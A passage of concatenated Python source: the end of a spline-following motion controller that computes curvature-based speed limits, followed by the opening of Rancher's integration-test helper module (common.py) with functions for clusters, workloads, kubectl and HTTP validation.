if self.posZLimit is not None and minPosZ < self.posZLimit:
self.maxAltExceeded = True
#this cable will breach the altitude limit, make the speed limit for this segment 0 to stop the vehicle
self.curvatureMapSpeedLimits[mapSeg] = 0.
else:
if maxCurvature != 0.:
# limit maxspeed by the max allowable normal acceleration at that point, bounded on the lower end by minSpeed
self.curvatureMapSpeedLimits[mapSeg] = max(math.sqrt(self.normAccelLim / maxCurvature), self.minSpeed)
else:
# if curvature is zero, means a straight segment
self.curvatureMapSpeedLimits[mapSeg] = self.maxSpeed
with self.curvatureMapSegmentsComputedLock:
self.curvatureMapSegmentsComputed += 1
return True
def _getCurvatureMapSpeedLimit(self, mapSeg):
'''Look up the speed limit for the requested map segment'''
# sanitize mapSeg
if mapSeg < 0 or mapSeg >= self.curvatureMapNumSegments:
return 0.
self._computeCurvatureMapSpeedLimit(mapSeg)
return self.curvatureMapSpeedLimits[mapSeg]
def _traverse(self, dt):
''' Advances the controller along the spline '''
spline_vel_unit = self.spline.velocity(self.currentSeg, self.currentU)
spline_vel_norm = spline_vel_unit.normalize()
# advances u by the amount specified by our speed and dt
self.currentU += self.speed * dt / spline_vel_norm
# handle traversing spline segments
if self.currentU > 1.:
if self.currentSeg < self.numSegments-1:
self.currentSeg += 1
self.currentU = 0. # NOTE: this truncates steps which cross spline joints
else:
self.currentU = 1.
elif self.currentU < 0.:
if self.currentSeg > 0:
self.currentSeg -= 1
self.currentU = 1. # NOTE: this truncates steps which cross spline joints
else:
self.currentU = 0.
# calculate our currentP
self.currentP = self.spline.nonDimensionalToArclength(self.currentSeg, self.currentU)[0]
# calculate our position and velocity commands
self.position = self.spline.position(self.currentSeg, self.currentU)
self.velocity = spline_vel_unit * self.speed
def _constrainSpeed(self, speed):
'''Looks ahead and behind current controller position and constrains to a speed limit'''
if speed > 0:
return min(self.maxSpeed, speed, self._getPosSpeedLimit(self.currentP))
elif speed < 0:
return max(-self.maxSpeed, speed, self._getNegSpeedLimit(self.currentP))
return speed
def _speedCurve(self, dist, speed):
'''Returns speed based on the sqrt function or a linear ramp (depending on dist)'''
linear_velocity = self.tanAccelLim / self.smoothStopP
linear_dist = linear_velocity / self.smoothStopP
if speed > linear_velocity:
return math.sqrt(2. * self.tanAccelLim * (speed**2/(2.*self.tanAccelLim) + dist))
else:
p1 = speed / self.smoothStopP
p2 = p1 + dist
if p2 > linear_dist:
return math.sqrt(2. * self.tanAccelLim * (p2 - 0.5*linear_dist))
else:
return p2 * self.smoothStopP
def _maxLookAheadDist(self):
'''Calculate how far it would take to come to a complete stop '''
linear_velocity = self.tanAccelLim / self.smoothStopP
linear_dist = linear_velocity / self.smoothStopP
if abs(self.speed) > linear_velocity:
return 0.5 * abs(self.speed)**2 / self.tanAccelLim + 0.5*linear_dist
else:
return abs(self.speed)/self.smoothStopP
def _getCurvatureMapSegment(self, p):
'''Get the curvature map segment index at the location p'''
return int(min(math.floor(p / self.curvatureMapSegLengthP),self.curvatureMapNumSegments-1))
def _getDistToCurvatureMapSegmentBegin(self, p1, idx):
'''Get distance from p1 to the beginning of the idx curvature map segment in meters'''
p2 = self.curvatureMapJointsP[idx]
return abs(p1-p2) * self.spline.totalArcLength
def _getDistToCurvatureMapSegmentEnd(self, p1, idx):
'''Get distance from p1 to the end of the idx curvature map segment in meters'''
p2 = self.curvatureMapJointsP[idx+1]
return abs(p1-p2) * self.spline.totalArcLength
def _getPosSpeedLimit(self, p):
'''Returns speed limit for a requested arc length normalized parameter, p, moving in the positive direction'''
# Identify our current curvature map segment
mapSeg = self._getCurvatureMapSegment(p)
# get speed limit for the upcoming curvature map segment
nextMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg+1)
# get distance (in meters) from current position to start of next curvature map segment
nextMapSegDist = self._getDistToCurvatureMapSegmentEnd(p, mapSeg)
# set speed limit to the minimum of the current curvature map segment and the transition to the next curvature map segment speed
speedLimit = min(self._getCurvatureMapSpeedLimit(mapSeg), self._speedCurve(nextMapSegDist, nextMapSegSpeed)) # m/s
# loop through all remaining segments in that direction
for mapSeg in range(mapSeg+1,self.curvatureMapNumSegments):
# increment distance by another curvature map segment length
nextMapSegDist += self.curvatureMapSegLengthM
# if that distance is greater than the distance it would take to stop, then break to save time (no need to look ahead any further)
if nextMapSegDist > self._maxLookAheadDist():
break
# get curvature map seg speed at this next segment
nextMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg+1) # NOTE: self.getCurvatureMapSpeedLimit(self.curvatureMapNumSegments) is 0
# limit us if the new map segment speed is slower than our current speed limit
speedLimit = min(speedLimit, self._speedCurve(nextMapSegDist, nextMapSegSpeed))
# if targetP is ahead of currentP then check for a speed limit to slow down at the target
if self.targetP >= self.currentP:
speedLimit = min(speedLimit, self._speedCurve(abs(self.targetP - self.currentP)*self.spline.totalArcLength, 0))
return speedLimit
def _getNegSpeedLimit(self, p):
'''Returns speed limit for a requested arc length normalized parameter, p, moving in the negative direction'''
# Identify our current curvature map segment
mapSeg = self._getCurvatureMapSegment(p)
# get speed limit for the previous curvature map segment
prevMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg-1)
# get distance (in meters) from current position to start of previous curvature map segment
prevMapSegDist = self._getDistToCurvatureMapSegmentBegin(p, mapSeg)
# set speed limit to the minimum of the current curvature map segment and the transition to the previous curvature map segment speed
speedLimit = min(self._getCurvatureMapSpeedLimit(mapSeg), self._speedCurve(prevMapSegDist, prevMapSegSpeed)) # m/s
# loop through all remaining segments in that direction
for mapSeg in reversed(range(0,mapSeg)):
# increment distance by another curvature map segment length
prevMapSegDist += self.curvatureMapSegLengthM
# if that distance is greater than the distance it would take to stop, then break to save time (no need to look ahead any further)
if prevMapSegDist > self._maxLookAheadDist():
break
# get curvature map seg speed at this previous segment
prevMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg-1) # NOTE: self.getCurvatureMapSpeedLimit(-1) is 0
# limit us if the new map segment speed is slower than our current speed limit
speedLimit = min(speedLimit, self._speedCurve(prevMapSegDist, prevMapSegSpeed))
if self.targetP <= self.currentP:
speedLimit = min(speedLimit, self._speedCurve(abs(self.targetP - self.currentP)*self.spline.totalArcLength, 0))
return -speedLimit
|
common.py
|
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_TIMEOUT = 120
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CATALOG_TIMEOUT = 15
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def random_str():
return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
return random.randint(0, 1000000)
def random_int(start, end):
return random.randint(start, end)
def random_test_name(name="test"):
return name + "-" + str(random_int(10000, 99999))
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
start = time.time()
ret = callback()
while ret is None or ret is False:
time.sleep(.5)
if time.time() - start > timeout:
if timeout_message:
raise Exception(timeout_message)
else:
raise Exception('Timeout waiting for condition')
ret = callback()
return ret
def random_name():
return "test" + "-" + str(random_int(10000, 99999))
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
workload_list = deployment_list + daemonset_list + cronjob_list
wls = project_client.list_workload(namespaceId=ns.id).data
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
p = wait_for_pod_to_running(p_client, pod)
assert p["status"]["phase"] == "Running"
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
while p.state != "running":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if 'k3s' in cluster.version["gitVersion"] and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
wait_for_wl_to_active(sys_p_client, wl)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
